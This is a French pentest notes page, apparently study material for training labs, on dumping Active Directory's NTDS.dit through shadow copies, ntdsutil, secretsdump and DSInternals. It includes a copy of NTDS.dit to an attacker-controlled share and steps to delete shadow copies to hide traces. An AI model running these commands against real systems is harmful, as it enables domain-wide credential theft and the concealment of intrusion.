Skip to content

Rebrec's Sec Notes

NTDS.dit

rebrec/rebsecnotes-public/

Rebrec's Sec Notes

rebrec/rebsecnotes-public/

Bienvenu sur rebsecnotes
CTF Challenges
CTF Challenges
- Htb
  Htb
Labs
Labs
- DNS server
  DNS server
  - DNS Server
Environnement
Environnement
- Programmation CSharp
  Programmation CSharp
  - Installation d'un environnement de développement CSharp
Méthodologie
Méthodologie
- 0 Reconnaissance
  0 Reconnaissance
  - 1 Passive
    1 Passive
    
    Externe
    Externe
    
    Collecte d'informations Wifi
    
    Employés
    
    Enumeration des domaines
    
    Whois
    
    Collecte de domaines et addresses IP
    Collecte de domaines et addresses IP
    
    Certificats
    
    Infrastructure
    
    Virus Total
  - 2 Active
    2 Active
    
    Enumération de VHOSTS
    
    Enumération des sous domaines
    
    Web
- 1 Enumération
  1 Enumération
  - Bases de données
    Bases de données
    
    MSSQL (SQL Server)
    
    MongoDB
    
    MySQL MariaDB
    
    Oracle TNS
    
    PostgreSQL
    
    Redis
    
    S3
  - Linux
    Linux
    
    Locale
    Locale
    
    Fichiers
  - Services
    Services
    
    DNS
    
    FTP
    
    IMAP et POP3
    
    IPMI
    
    NFS
    
    R Services
    
    RDP
    
    Rsync
    
    SMB
    
    SMTP
    
    SNMP
    
    SSH
    
    WMI
    
    WinRM
  - Web
    Web
    
    Distante
    Distante
    
    Recherche de sauvegardes
    
    Gobuster
  - Windows
    Windows
    
    Distante
    Distante
    
    MS SQL
    
    Recherche de fichiers intéressants depuis Linux
    
    Active Directory
    Active Directory
    
    Active Directory
    
    Locale
    Locale
    
    Premières Vérifications Locales sous Windows
    
    Accès Fichier
    
    Applocker
    
    Connexions TCP
    
    Drivers
    
    Firewall
    
    Infrastructure à clés publiqués (PKI)
    
    Logiciels installés
    
    Partages
    
    Processus
    
    Recherche de fichiers intéressants et credentials depuis Windows
    
    Services en écoute
    
    Services
    
    Système d'exploitation
    
    Taches plannifiées
    
    Vol de hashs
- 2 Obtention d'accès
  2 Obtention d'accès
  - Shells
- 4 Post Exploitation
  4 Post Exploitation
  - Linux
    Linux
    
    Local
    Local
    
    Credential Hunting
  - Windows
    Windows
    
    Local
    Local
    
    Credential Hunting
- Pentest
  Pentest
  - 3 Production de rapports
    3 Production de rapports
    
    Contenu
Techniques
Techniques
- Ajouter un module à Metasploit
- Chiffrer un fichier
- Création d'un exécutable pour lancer une commande
- Enumération d'utilisateurs à distance via la messagerie
- Compilation
  Compilation
  - Compilation d'exploit windows en language C++
- Evasion
  Evasion
  - Modification de User Agent
  - Web Application Firewall bypass
- Linux
  Linux
  - Authentification Kerberos
- Mots de passe
  Mots de passe
  - Bruteforcer un service
  - Choisir une Wordlist
  - Générer une Wordlist
  - Mots de passe par défaut
  - Password Spraying
  - Casser un mot de passe
    Casser un mot de passe
    
    Bitlocker
    
    En Ligne
    
    Hashcat
    
    MD5
    
    Mot de passe Linux
- Pivoting
  Pivoting
- Transferts de fichiers
  Transferts de fichiers
  - Autre outils
    Autre outils
    
    RDP
    
    Nc et ncat
    
    Winrm
  - Linux
    Linux
    
    Listener HTTPS
    
    Listeners HTTP
    
    Transfert de fichiers (download)
  - Via du code
    Via du code
    
    Télécharger avec du code
    
    Uploader avec du code
  - Windows
    Windows
    
    Transfert de fichiers (download)
- Windows
  Windows
  - Icacls
  - AD
    AD
    
    Extra SID Golden Tickets
    
    Pass The Hash (PtH)
    
    Pass the Ticket (PtT)
    
    ACLs
    ACLs
    
    Locale
    Locale
    
    Manuelle (avec module ActiveDirectory)
    
    PowerView
    
    Kerberos
    Kerberos
    
    ASREPRoasting
    
    Kerberoasting
    Kerberoasting
    
    Cassage de mots de passes Kerberos
    
    Kerberoasting
    
    Distant
    Distant
    
    GetUserSPNs.py
    
    Locale
    Locale
    
    Manuel
    
    Powerview
    
    Rubeus
    
    Mauvaises configuration communes
    Mauvaises configuration communes
    
    Elements de configuration à regarder
    
    Exchange
  - Dump de credentials
    Dump de credentials
    
    Dump LSASS et extraction de secrets
    
    Dump de la SAM
    
    NTDS.dit NTDS.dit
    Table of contents
    
    Dump d'NTDS.dit
    
    Localement
    
    Cliché instantané (vssadmin)
    
    Créer une Shadow Copy (cliché instantanné) du disque C
    
    Copier à partir du cliché instantanné
    
    Cliché instantanné (diskshadow.exe)
    
    Créer une Shadow Copy (cliché instantanné) du disque C
    
    Copier à partir du cliché instantanné
    
    Création d'une sauvegarde via ntdsutil (non testé)
    
    A distance
    
    Extraction des informations d'identification (credentials)
    
    Localement
    
    Extraction des informations présentes dans NTDS.dit via DSInternals
    
    A distance
    
    Extraction des hash d'un dump NTDS.dit via secretsdump.py
    
    DCSync
    DCSync
    
    DCSync
    
    Distante
    Distante
    
    Attaque DCSync depuis Linux
    
    Locale
    Locale
    
    Attaque DCSync depuis Windows
  - Privesc
    Privesc
    
    Relais NTLM (Forced Authentication Attack)
    
    Exploitation de vulnérabilités (Quick Wins)
    Exploitation de vulnérabilités (Quick Wins)
    
    Quick Wins
    
    2021
    2021
    
    06
    06
    
    PrintNightmare (CVE 2021 1675)
    
    08
    08
    
    Petit Potam (MS EFSRPC)
    
    11
    11
    
    NoPac (Sam AccountName Spoofing)

NTDS.dit

Dump d'NTDS.dit

Localement

Cliché instantané (vssadmin)

Créer une Shadow Copy (cliché instantanné) du disque C

La base NTDS.dit est par défaut stockée dans C:\Windows\NTDS

vssadmin CREATE SHADOW /For=C:

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {186d5979-2f2b-4afe-8101-9f1111e4cb1a}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

Copier à partir du cliché instantanné

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit \\<Attacker_IP>\share\

Cliché instantanné (diskshadow.exe)

Créer une Shadow Copy (cliché instantanné) du disque C

diskshadow.exe
 set verbose on
 set metadata C:\Windows\Temp\meta.cab
 set context clientaccessible
 set context persistent
 begin backup
 add volume C: alias cdrive
 create
 expose %cdrive% E:
 end backup
 exit

Effacer ses traces : après avoir copié ntds.dit (ou autre) on pourra supprimer le cliché instantané ainsi que son exposition via le lecteur E:

diskshadow.exe
 unexpose e: 
 list shadows all# affiche la liste des snapshots si on n'a pas noté l'ID lors de sa création

 DELETE SHADOWS Exposed E: 
 # ou 
 DELETE SHADOWS SET {446f7942-bd76-41a9-aff7-d7c854abe93f}

Copier à partir du cliché instantanné

Remarque : Si le fichier n'est pas accessible et que l'on est membre du groupe Backup Operator, on pourra y accéder via le privilège SeBackupPrivilege (voir [[Exploitation des privilèges Windows]])

# cas 1 : Robocopy "sait" utiliser le privilège SeBackupPrivilege
robocopy /B E:\Windows\NTDS .\ntds ntds.dit

# cas 2 : sans robocopy, ce cmdlet est lié à un outil référencé dans le lien ci-dessus
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

Création d'une sauvegarde via ntdsutil (non testé)

Le fichier créé dans ce format pourra par la suite être exploité pour fournir des métriques sur différents éléments liés aux mots de passe et leur robuster via l'outil Domain Password Audit Tool (DPAT) https://github.com/clr2of8/DPAT

ntdsutil "ac in ntds" "ifm" "cr fu c:\temp" q q

A distance

## utilise à distance ntdsutil
nxc smb ip -u user -p pass -M ntdsutil

crackmapexec smb $TARGET_IP -u $AD_USER -p $AD_PASSWORD --ntds

secretsdump.py -just-dc-user $AD_DOMAIN/krbtgt  $AD_DOMAIN/$AD_USER:$AD_PASSWORD@$TARGET_IP

Extraction des informations d'identification (credentials)

Localement

Extraction des informations présentes dans NTDS.dit via DSInternals

# https://github.com/MichaelGrafnetter/DSInternals/releases/download/v4.12/DSInternals_v4.12.zip
PS C:\htb> Import-Module .\DSInternals.psd1
PS C:\htb> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

A distance

Extraction des hash d'un dump NTDS.dit via secretsdump.py

Prérequis : disposer d'NTDS.dit et du dump SYSTEM via reg save HKLM\SYSTEM SYSTEM.SAV

secretsdump.py -ntds ntds.dit -system SYSTEM.sav -hashes lmhash:nthash LOCAL